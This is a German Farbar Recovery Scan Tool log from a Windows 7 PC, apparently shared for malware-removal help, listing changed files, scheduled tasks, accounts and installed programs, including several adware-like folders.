2015-12-29 11:51 - 2015-12-29 14:41 - 00000000 ____D C:\Users\aal\Documents\CCleaner Sicherungen
2015-12-29 11:32 - 2015-12-29 12:49 - 00001277 _____ C:\Users\aal\Desktop\Revo Uninstaller.lnk
2015-12-29 11:32 - 2015-12-29 11:32 - 00000000 ____D C:\Users\aal\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
2015-12-29 11:32 - 2015-12-29 11:32 - 00000000 ____D C:\Program Files (x86)\VS Revo Group
2015-12-28 19:27 - 2015-12-28 19:27 - 00000000 ____D C:\ProgramData\bd608616-4383-0
2015-12-28 19:26 - 2015-12-28 19:26 - 00019292 _____ C:\Windows\System32\Tasks\{12AEDD6C-D8B3-9FA2-F2CA-DCD568508709}
2015-12-28 19:26 - 2015-12-28 19:26 - 00000000 ____D C:\ProgramData\bd608616-07a7-1
2015-12-28 19:26 - 2015-12-28 19:26 - 00000000 ____D C:\ProgramData\{04bcf8cb-3064-1}
2015-12-28 19:26 - 2015-12-28 19:26 - 00000000 ____D C:\ProgramData\{01b7d148-7064-0}
2015-12-19 20:18 - 2015-12-19 20:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee Security Scan Plus
2015-12-17 16:09 - 2015-12-17 16:09 - 00038036 _____ C:\Users\aal\Downloads\100605243-1.pdf
2015-12-15 16:38 - 2015-12-15 16:38 - 00224700 _____ C:\Users\aal\Downloads\Briefmarken.20Stk.13.12.2015_0732 (1).pdf
2015-12-13 16:44 - 2015-12-13 16:44 - 00006994 _____ C:\Users\aal\Downloads\TK_Familienversicherung_Angaben.pdf
2015-12-13 07:38 - 2015-12-13 07:38 - 00045148 _____ C:\Users\aal\Downloads\Kontoauszug_3223361__Nr.0052015_vom_02.12.2015_20151213073820.pdf
2015-12-13 07:37 - 2015-12-13 07:37 - 00043366 _____ C:\Users\aal\Downloads\Mitteilung_3223361_vom_02.12.2015_20151213073724.pdf
2015-12-13 07:37 - 2015-12-13 07:37 - 00042642 _____ C:\Users\aal\Downloads\Entgeltinformationen_3223361_vom_02.12.2015_20151213073657.pdf
2015-12-13 07:36 - 2015-12-13 07:36 - 00042645 _____ C:\Users\aal\Downloads\Entgeltinformationen_3223361_vom_02.12.2015_20151213073620.pdf
2015-12-13 07:33 - 2015-12-13 07:33 - 00224700 _____ C:\Users\aal\Downloads\Briefmarken.20Stk.13.12.2015_0732.pdf
2015-12-10 09:56 - 2015-12-10 09:56 - 00000000 ____D C:\Users\Public\Documents\crxbro
2015-12-10 08:55 - 2015-12-10 08:55 - 00000000 ____D C:\ProgramData\{25bf7ec4-40c8-0}
2015-12-10 08:55 - 2015-12-10 08:55 - 00000000 ____D C:\ProgramData\{0c8eb58a-20c8-1}
2015-12-09 15:36 - 2015-12-09 15:36 - 00000000 ____D C:\Users\aal\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox
==================== Ein Monat: Geänderte Dateien und Ordner ========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2016-01-07 10:40 - 2009-10-05 22:35 - 00000000 ____D C:\Windows
2016-01-07 10:36 - 2009-07-14 05:45 - 00018512 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2016-01-07 10:36 - 2009-07-14 05:45 - 00018512 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2016-01-07 10:30 - 2015-07-15 18:05 - 00000000 ____D C:\Program Files (x86)\WinZipper
2016-01-07 10:28 - 2011-08-02 15:47 - 00065536 _____ C:\Windows\system32\Ikeext.etl
2016-01-07 10:27 - 2009-07-14 06:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-01-07 10:26 - 2009-07-14 04:20 - 00000000 ____D C:\Windows\tracing
2016-01-06 16:53 - 2015-06-02 06:43 - 00001216 _____ C:\Windows\Tasks\DropboxUpdateTaskUserS-1-5-21-2436113304-3946048090-3963370519-1000UA.job
2016-01-06 15:30 - 2011-07-30 18:29 - 00003914 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{D269C83D-1E20-4D4A-83DF-71B2A1A7D837}
2016-01-06 14:18 - 2015-07-10 13:18 - 00000350 _____ C:\Windows\Tasks\cmdLogs.job
2016-01-06 14:18 - 2015-06-10 07:18 - 00000350 _____ C:\Windows\Tasks\DataDimes.job
2016-01-06 14:09 - 2015-07-12 19:09 - 00000350 _____ C:\Windows\Tasks\TrackGraph.job
2016-01-06 13:50 - 2015-07-19 12:50 - 00000350 _____ C:\Windows\Tasks\ShadowOptimizer.job
2016-01-06 13:11 - 2015-07-17 04:59 - 00000350 _____ C:\Windows\Tasks\DigiStage.job
2016-01-05 19:04 - 2012-08-24 19:25 - 00000000 ____D C:\Windows\Minidump
2016-01-05 14:55 - 2009-07-14 06:08 - 00032640 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2016-01-05 07:19 - 2011-07-31 02:05 - 00699432 _____ C:\Windows\system32\perfh007.dat
2016-01-05 07:19 - 2011-07-31 02:05 - 00149572 _____ C:\Windows\system32\perfc007.dat
2016-01-05 07:19 - 2009-07-14 06:13 - 01620684 _____ C:\Windows\system32\PerfStringBackup.INI
2016-01-05 07:19 - 2009-07-14 04:20 - 00000000 ____D C:\Windows\inf
2016-01-04 15:16 - 2015-06-02 06:42 - 00001164 _____ C:\Windows\Tasks\DropboxUpdateTaskUserS-1-5-21-2436113304-3946048090-3963370519-1000Core.job
2015-12-30 21:08 - 2009-10-29 07:38 - 00000000 ____D C:\ProgramData\Norton
2015-12-30 21:08 - 2009-10-29 07:37 - 00000000 ____D C:\Program Files (x86)\NortonInstaller
2015-12-29 14:58 - 2015-05-20 18:59 - 00000000 ____D C:\Program Files (x86)\Mozilla Thunderbird
2015-12-29 14:58 - 2015-04-17 07:15 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2015-12-29 14:54 - 2015-04-17 07:15 - 00002099 _____ C:\Users\Public\Desktop\Mozilla Thunderbird.lnk
2015-12-29 14:29 - 2009-10-29 07:42 - 00000000 ____D C:\ProgramData\Symantec
2015-12-29 14:19 - 2014-09-04 15:48 - 00000000 ___RD C:\Users\aal\Dropbox
2015-12-29 14:19 - 2014-09-04 15:46 - 00000000 ____D C:\Users\aal\AppData\Roaming\Dropbox
2015-12-29 14:14 - 2012-05-05 18:49 - 00000000 ____D C:\Program Files (x86)\Norton 360
2015-12-29 13:56 - 2009-10-29 07:28 - 00000000 ____D C:\Program Files (x86)\Google
2015-12-29 12:49 - 2015-10-24 07:49 - 00001875 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Software Updates.lnk
2015-12-29 12:49 - 2015-09-12 09:01 - 00001743 _____ C:\Users\aal\Desktop\AcroRd32 - Verknüpfung.lnk
2015-12-29 12:49 - 2015-08-02 06:14 - 00001971 _____ C:\Users\Public\Desktop\McAfee Security Scan Plus.lnk
2015-12-29 12:49 - 2015-04-17 07:15 - 00002099 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Thunderbird.lnk
2015-12-29 12:49 - 2014-12-24 21:39 - 00001085 _____ C:\Users\aal\Desktop\tiptoi.lnk
2015-12-29 12:49 - 2014-09-04 15:48 - 00001003 _____ C:\Users\aal\Desktop\Dropbox.lnk
2015-12-29 12:49 - 2014-03-05 19:50 - 00001333 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Browser 7 der Telekom.lnk
2015-12-29 12:49 - 2014-03-05 19:50 - 00001327 _____ C:\Users\Public\Desktop\Browser 7 der Telekom.lnk
2015-12-29 12:49 - 2014-01-20 09:09 - 00001999 _____ C:\Users\Public\Desktop\Samsung Kies.lnk
2015-12-29 12:49 - 2014-01-20 09:09 - 00001997 _____ C:\Users\Public\Desktop\Samsung Kies (Lite).lnk
2015-12-29 12:49 - 2013-10-11 08:43 - 00001081 _____ C:\Users\Public\Desktop\PDF24 Editor.lnk
2015-12-29 12:49 - 2013-10-11 08:43 - 00001066 _____ C:\Users\Public\Desktop\PDF24 Fax.lnk
2015-12-29 12:49 - 2013-02-20 19:24 - 00002147 _____ C:\Users\Public\Desktop\Brother Creative Center.lnk
2015-12-29 12:49 - 2013-02-10 09:10 - 00001848 _____ C:\Users\Public\Desktop\QuickTime Player.lnk
2015-12-29 12:49 - 2013-01-28 12:09 - 00002507 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Apple Software Update.lnk
2015-12-29 12:49 - 2012-12-28 17:50 - 00002229 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Digital Editions 2.0.lnk
2015-12-29 12:49 - 2012-12-28 17:50 - 00002223 _____ C:\Users\Public\Desktop\Adobe Digital Editions 2.0.lnk
2015-12-29 12:49 - 2012-05-18 19:56 - 00001455 _____ C:\Users\aal\Desktop\notepad++ - Verknüpfung.lnk
2015-12-29 12:49 - 2012-05-03 04:33 - 00002429 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader X.lnk
2015-12-29 12:49 - 2012-05-03 04:33 - 00002022 _____ C:\Users\Public\Desktop\Adobe Reader X.lnk
2015-12-29 12:49 - 2012-04-27 14:21 - 00001234 _____ C:\Users\Public\Desktop\HP Deskjet 2050 J510 series Scan.lnk
2015-12-29 12:49 - 2012-04-27 08:47 - 00000485 _____ C:\Users\aal\Desktop\Toshiba HDD (E) - Verknüpfung.lnk
2015-12-29 12:49 - 2012-04-27 08:29 - 00002308 _____ C:\Users\Public\Desktop\T-Online 6.0.lnk
2015-12-29 12:49 - 2012-04-26 18:09 - 00001090 _____ C:\Users\aal\Desktop\Microsoft Word.lnk
2015-12-29 12:49 - 2012-04-26 18:09 - 00001078 _____ C:\Users\aal\Desktop\Microsoft Excel.lnk
2015-12-29 12:49 - 2011-07-31 09:35 - 00001335 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Live ID.lnk
2015-12-29 12:49 - 2011-07-30 16:59 - 00001186 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Works-Start.lnk
2015-12-29 12:49 - 2011-07-30 16:49 - 00001434 _____ C:\Users\aal\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2015-12-29 12:49 - 2009-10-29 06:49 - 00001333 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Media Center.lnk
2015-12-29 12:49 - 2009-10-29 06:49 - 00001314 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows DVD Maker.lnk
2015-12-29 12:49 - 2009-07-14 06:01 - 00001218 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Default Programs.lnk
2015-12-29 12:49 - 2009-07-14 05:57 - 00001511 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2015-12-29 12:49 - 2009-07-14 05:57 - 00001340 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Anytime Upgrade.lnk
2015-12-29 12:49 - 2009-07-14 05:57 - 00001292 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sidebar.lnk
2015-12-29 12:49 - 2009-07-14 05:57 - 00001234 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\XPS Viewer.lnk
2015-12-29 12:49 - 2009-07-14 05:54 - 00001198 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Fax and Scan.lnk
2015-12-29 12:49 - 2009-07-14 05:49 - 00001246 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Windows Update.lnk
2015-12-29 12:48 - 2015-08-10 15:04 - 00000306 __RSH C:\ProgramData\ntuser.pol
2015-12-29 12:47 - 2015-09-24 07:10 - 00000000 ____D C:\Users\aal\AppData\Roaming\TSv
2015-12-29 12:47 - 2015-08-10 19:34 - 00000000 ____D C:\Program Files (x86)\AppendGeneration
2015-12-29 12:47 - 2015-07-07 11:02 - 00000000 ____D C:\Program Files (x86)\Acidic Buy
2015-12-29 12:47 - 2015-06-04 16:00 - 00000000 ____D C:\Users\aal\AppData\Roaming\Elex-tech
2015-12-29 12:47 - 2015-06-04 16:00 - 00000000 ____D C:\Program Files (x86)\Elex-tech
2015-12-29 12:47 - 2015-05-11 13:20 - 00000000 ____D C:\Program Files (x86)\LiveReader
2015-12-29 12:47 - 2009-07-14 04:20 - 00000000 ____D C:\Windows\TAPI
2015-12-29 12:40 - 2014-02-03 06:34 - 00000000 ____D C:\Users\aal\AppData\Roaming\DigitalSites
2015-12-29 12:39 - 2013-09-29 07:39 - 00000000 ____D C:\Users\aal\AppData\LocalLow\Delta
2015-12-29 12:36 - 2015-08-18 12:45 - 00000000 ____D C:\Program Files (x86)\MinimumPriceea
2015-12-29 12:36 - 2015-08-18 12:45 - 00000000 ____D C:\Program Files (x86)\MInimUmePrioce
2015-12-29 12:36 - 2015-08-18 12:44 - 00000000 ____D C:\Program Files (x86)\Oweb Voice Input
2015-12-29 12:36 - 2015-08-17 10:24 - 00000000 ____D C:\Program Files (x86)\TotalRecipeSearch
2015-12-29 12:36 - 2015-08-17 10:24 - 00000000 ____D C:\Program Files (x86)\NEwSoavvEr
2015-12-29 12:36 - 2015-08-03 17:27 - 00000000 ____D C:\Program Files (x86)\Mahjong
2015-12-29 12:36 - 2015-07-24 05:14 - 00000000 ____D C:\Program Files (x86)\Oogle
2015-12-29 12:36 - 2015-07-22 17:31 - 00000000 ____D C:\Program Files (x86)\Hover Zoom
2015-12-29 12:36 - 2015-07-22 17:30 - 00000000 ____D C:\Program Files (x86)\dolilarsavver
2015-12-29 12:36 - 2015-07-18 07:56 - 00000000 ____D C:\Program Files (x86)\Hush private bookmarking
2015-12-29 12:36 - 2015-07-12 19:29 - 00000000 ____D C:\Program Files (x86)\rockeetdEuaL
2015-12-29 12:36 - 2015-07-12 19:29 - 00000000 ____D C:\Program Files (x86)\Page Eraser
2015-12-29 12:36 - 2015-07-11 07:37 - 00000000 ____D C:\Program Files (x86)\niitrOddeual
2015-12-29 12:36 - 2015-07-11 07:37 - 00000000 ____D C:\Program Files (x86)\Check My Links
2015-12-29 12:36 - 2015-07-10 13:19 - 00000000 ____D C:\Program Files (x86)\Video Resumer
2015-12-29 12:36 - 2015-06-27 13:23 - 00000000 ____D C:\Program Files (x86)\rikaikun
2015-12-29 12:36 - 2015-06-20 07:42 - 00000000 ____D C:\Program Files (x86)\Wookmark
2015-12-29 12:36 - 2015-06-08 16:19 - 00000000 ____D C:\Program Files (x86)\oofferDeael
2015-12-29 12:36 - 2015-06-01 17:26 - 00000000 ____D C:\Program Files (x86)\Online Fun Games
2015-12-29 12:36 - 2015-05-29 07:51 - 00000000 ____D C:\Program Files (x86)\Video Download Manager
2015-12-29 12:36 - 2015-05-12 13:25 - 00000000 ____D C:\Program Files (x86)\DolLarsaaver
2015-12-29 12:34 - 2013-09-29 08:34 - 00000212 _____ C:\Users\aal\AppData\Roaming\WB.CFG
2015-12-29 12:01 - 2013-10-13 05:46 - 00001933 _____ C:\Windows\wininit.ini
2015-12-29 11:49 - 2011-07-31 09:50 - 00000000 ____D C:\Users\aal\Tracing
2015-12-29 11:46 - 2012-05-10 18:43 - 00000000 ____D C:\Users\aal\AppData\Local\CrashDumps
2015-12-29 11:46 - 2009-10-29 07:44 - 00000000 ____D C:\Windows\Panther
2015-12-28 16:56 - 2015-07-28 18:17 - 00000024 _____ C:\Users\aal\AppData\Roaming\appdataFr25.bin
2015-12-19 20:18 - 2015-11-07 20:25 - 00000000 ____D C:\Program Files\McAfee Security Scan
2015-12-18 12:36 - 2013-02-26 17:53 - 00000000 _____ C:\Users\aal\Documents\Nuance Image Printer Writer Port
2015-12-10 08:55 - 2015-12-04 14:18 - 00000000 ____D C:\ProgramData\{10c069ad-60c8-1}
2015-12-10 08:55 - 2015-12-04 14:18 - 00000000 ____D C:\ProgramData\{03bc599e-50c8-0}
==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======
2009-10-29 07:08 - 2008-04-29 14:04 - 0157442 _____ () C:\Program Files (x86)\Common Files\emachines.ico
2015-06-24 07:05 - 2015-08-06 16:27 - 0000020 _____ () C:\Users\aal\AppData\Roaming\appdataFr2.bin
2015-07-28 18:17 - 2015-12-28 16:56 - 0000024 _____ () C:\Users\aal\AppData\Roaming\appdataFr25.bin
2013-09-29 08:34 - 2015-12-29 12:34 - 0000212 _____ () C:\Users\aal\AppData\Roaming\WB.CFG
2013-12-31 06:34 - 2014-01-03 06:34 - 0000005 _____ () C:\Users\aal\AppData\Roaming\WBPU-Q5-TTL.DAT
2013-09-29 08:34 - 2014-02-01 12:02 - 0000005 _____ () C:\Users\aal\AppData\Roaming\WBPU-TTL.DAT
2012-04-26 16:18 - 2012-04-26 16:18 - 0000000 _____ () C:\Users\aal\AppData\Roaming\wklnhst.dat
2013-10-03 15:18 - 2013-10-21 16:56 - 0361117 _____ () C:\Users\aal\AppData\Local\newhb2.crx
2011-09-20 10:29 - 2011-09-20 10:29 - 0000057 _____ () C:\ProgramData\Ament.ini
2009-10-29 07:09 - 2009-07-18 02:57 - 0036136 _____ (Oberon Media) C:\ProgramData\FullRemove.exe
2011-07-31 11:28 - 2011-08-28 12:58 - 0009904 _____ () C:\ProgramData\hpzinstall.log
2015-10-27 06:38 - 2015-10-27 06:38 - 0000098 _____ () C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat
Dateien, die verschoben oder gelöscht werden sollten:
====================
C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat
Einige Dateien in TEMP:
====================
C:\Users\aal\AppData\Local\Temp\DseShExt-x64.dll
C:\Users\aal\AppData\Local\Temp\DseShExt-x86.dll
C:\Users\aal\AppData\Local\Temp\SDShelEx-win32.dll
C:\Users\aal\AppData\Local\Temp\SDShelEx-x64.dll
==================== Bamital & volsnap =================
(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)
C:\Windows\system32\winlogon.exe => Datei ist digital signiert
C:\Windows\system32\wininit.exe => Datei ist digital signiert
C:\Windows\SysWOW64\wininit.exe => Datei ist digital signiert
C:\Windows\explorer.exe => Datei ist digital signiert
C:\Windows\SysWOW64\explorer.exe => Datei ist digital signiert
C:\Windows\system32\svchost.exe => Datei ist digital signiert
C:\Windows\SysWOW64\svchost.exe => Datei ist digital signiert
C:\Windows\system32\services.exe => Datei ist digital signiert
C:\Windows\system32\User32.dll => Datei ist digital signiert
C:\Windows\SysWOW64\User32.dll => Datei ist digital signiert
C:\Windows\system32\userinit.exe => Datei ist digital signiert
C:\Windows\SysWOW64\userinit.exe => Datei ist digital signiert
C:\Windows\system32\rpcss.dll => Datei ist digital signiert
C:\Windows\system32\dnsapi.dll => Datei ist digital signiert
C:\Windows\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\Windows\system32\Drivers\volsnap.sys => Datei ist digital signiert
LastRegBack: 2015-12-29 17:18
==================== Ende von FRST.txt ============================
Code:
ATTFilter Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version:06-01-2015
durchgeführt von aal (2016-01-07 10:42:00)
Gestartet von C:\Users\aal\Downloads
Windows 7 Home Premium Service Pack 1 (X64) (2011-07-30 15:46:55)
Start-Modus: Normal
==========================================================
==================== Konten: =============================
aal (S-1-5-21-2436113304-3946048090-3963370519-1000 - Administrator - Enabled) => C:\Users\aal
Administrator (S-1-5-21-2436113304-3946048090-3963370519-500 - Administrator - Disabled)
Gast (S-1-5-21-2436113304-3946048090-3963370519-501 - Limited - Enabled)
HomeGroupUser$ (S-1-5-21-2436113304-3946048090-3963370519-1004 - Limited - Enabled)
==================== Sicherheits-Center ========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
AV: avast! Antivirus (Enabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: avast! Antivirus (Enabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
==================== Installierte Programme ======================
(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)
64 Bit HP CIO Components Installer (Version: 6.2.1 - Hewlett-Packard) Hidden
Adobe Digital Editions 2.0 (HKLM-x32\...\Adobe Digital Editions 2.0) (Version: 2.0 - Adobe Systems Incorporated)
Adobe Flash Player 12 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 12.0.0.70 - Adobe Systems Incorporated)
Adobe Flash Player 12 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 12.0.0.70 - Adobe Systems Incorporated)
Adobe Reader X (10.1.16) - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AA1000000001}) (Version: 10.1.16 - Adobe Systems Incorporated)
Apple Software Update (HKLM-x32\...\{B74F042E-E1B9-4A5B-8D46-387BB172F0A4}) (Version: 2.0.2.92 - Apple Inc.)
Avast Free Antivirus (HKLM-x32\...\Avast) (Version: 11.1.2245 - AVAST Software)
Bing Bar (HKLM-x32\...\{3365E735-48A6-4194-9988-CE59AC5AE503}) (Version: 7.3.132.0 - Microsoft Corporation)
Brother MFL-Pro Suite MFC-J6510DW (HKLM-x32\...\{17795164-3BC1-4D4F-8ADA-65C895EBFC9A}) (Version: 1.0.27.0 - Brother Industries, Ltd.)
Browser 7 der Telekom 34.0.19 (x86 de) (HKLM-x32\...\Browser 7 der Telekom 34.0.19 (x86 de)) (Version: 34.0.19 - Deutsche Telekom AG)
Browser 7 Maintenance Service (HKLM-x32\...\Browser7MaintenanceService) (Version: 29.0.40 - Deutsche Telekom AG)
Bundled software uninstaller (HKLM-x32\...\bi_uninstaller) (Version: - ) <==== ACHTUNG
Compatibility Pack für 2007 Office System (HKLM-x32\...\{90120000-0020-0407-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
DHTML Editing Component (HKLM-x32\...\{2EA870FA-585F-4187-903D-CB9FFD21E2E0}) (Version: 6.02.0001 - Microsoft Corporation)
Dropbox (HKU\S-1-5-21-2436113304-3946048090-3963370519-1000\...\Dropbox) (Version: 3.12.5 - Dropbox, Inc.)
eMachines Recovery Management (HKLM-x32\...\{7F811A54-5A09-4579-90E1-C93498E230D9}) (Version: 4.05.3005 - Acer Incorporated)
eMachines Registration (HKLM-x32\...\eMachines Registration) (Version: 1.02.3006 - Acer Incorporated)
eMachines ScreenSaver (HKLM-x32\...\eMachines Screensaver) (Version: 1.1.0812 - eMachines Incorporated)
eMachines Updater (HKLM-x32\...\{EE171732-BEB4-4576-887D-CB62727F01CA}) (Version: 1.01.3017 - Acer Incorporated)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
HP Deskjet 2050 J510 series - Grundlegende Software für das Gerät (HKLM\...\{54B0845F-5540-4492-9939-CD8880ABABF0}) (Version: 22.50.231.0 - Hewlett-Packard Co.)
HP Deskjet 2050 J510 series Hilfe (HKLM-x32\...\{7A3DF2E2-CF13-44FB-A93E-F71D5381DB3F}) (Version: 140.0.61.61 - Hewlett Packard)
HP Update (HKLM-x32\...\{B0069CFA-5BB9-4C03-B1C6-89CE290E5AFE}) (Version: 5.002.006.003 - Hewlett-Packard)
Identity Card (HKLM-x32\...\Identity Card) (Version: 1.00.3002 - Acer Incorporated)
ImagXpress (x32 Version: 7.0.74.0 - Nero AG) Hidden
Junk Mail filter update (x32 Version: 14.0.8089.726 - Microsoft Corporation) Hidden
Malwarebytes Anti-Malware Version 2.0.2.1012 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)
McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.11.266.3 - McAfee, Inc.)
Microsoft .NET Framework 4.5.1 (Deutsch) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1031) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{90120000-0100-0407-0000-0000000FF1CE}_OMUI.de-de_{DB2ACBD1-65B1-4FC5-881E-4E75C668E7E2}) (Version: - Microsoft)
Microsoft Office 97, Professional Edition (HKLM-x32\...\Office8.0) (Version: - )
Microsoft Office Language Pack 2007 - German/Deutsch (HKLM-x32\...\OMUI.de-de) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40416.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Works (HKLM-x32\...\{62F7DA7E-CCCB-439C-A760-00C3926E761F}) (Version: 9.7.0621 - Microsoft Corporation)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 31.6.0 - Mozilla)
Mozilla Thunderbird 38.5.0 (x86 de) (HKLM-x32\...\Mozilla Thunderbird 38.5.0 (x86 de)) (Version: 38.5.0 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
Notepad++ (HKLM-x32\...\Notepad++) (Version: 6.1.2 - )
Nuance PaperPort 12 (HKLM-x32\...\{6C0A559F-8583-4B5A-8B50-20BEE15D8E64}) (Version: 12.1.0000 - Nuance Communications, Inc.)
Nuance PDF Viewer Plus (HKLM-x32\...\{28656860-4728-433C-8AD4-D1A930437BC8}) (Version: 5.30.3290 - Nuance Communications, Inc)
NVIDIA Drivers (HKLM\...\NVIDIA Drivers) (Version: 1.9 - NVIDIA Corporation)
PaperPort Image Printer 64-bit (HKLM\...\{715CAACC-579B-4831-A5F4-A83A8DE3EFE2}) (Version: 1.00.0001 - Nuance Communications, Inc.)
PDF24 Creator 5.7.0 (HKLM-x32\...\{81A6F461-0DBA-4F12-B56F-0E977EC10576}_is1) (Version: - PDF24.org)
QuickTime (HKLM-x32\...\{5B09BD67-4C99-46A1-8161-B7208CE18121}) (Version: 7.3.0.70 - Apple Inc.)
Ravensburger tiptoi (HKLM-x32\...\Ravensburger tiptoi) (Version: - )
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5898 - Realtek Semiconductor Corp.)
Revo Uninstaller 1.95 (HKLM-x32\...\Revo Uninstaller) (Version: 1.95 - VS Revo Group)
Samsung Kies (HKLM-x32\...\InstallShield_{758C8301-2696-4855-AF45-534B1200980A}) (Version: 2.6.1.13105_7 - Samsung Electronics Co., Ltd.)
Samsung Kies (x32 Version: 2.6.1.13105_7 - Samsung Electronics Co., Ltd.) Hidden
SAMSUNG USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.29.0 - SAMSUNG Electronics Co., Ltd.)
Scansoft PDF Professional (x32 Version: - ) Hidden
SimpleOCR 3.1 (HKLM-x32\...\SimpleOCR 3.1) (Version: - )
T-Home Dialerschutz-Software (HKLM-x32\...\{E8C5BD56-F5D8-41D3-8A71-273468FE256A}) (Version: - )
T-Online 6.0 (HKLM-x32\...\{B1275E23-717A-4D52-997A-1AD1E24BC7F3}) (Version: - )
T-Online WLAN-Access Finder (HKLM-x32\...\{295C31E5-3F91-498E-9623-DA24D2FA2B6A}) (Version: - )
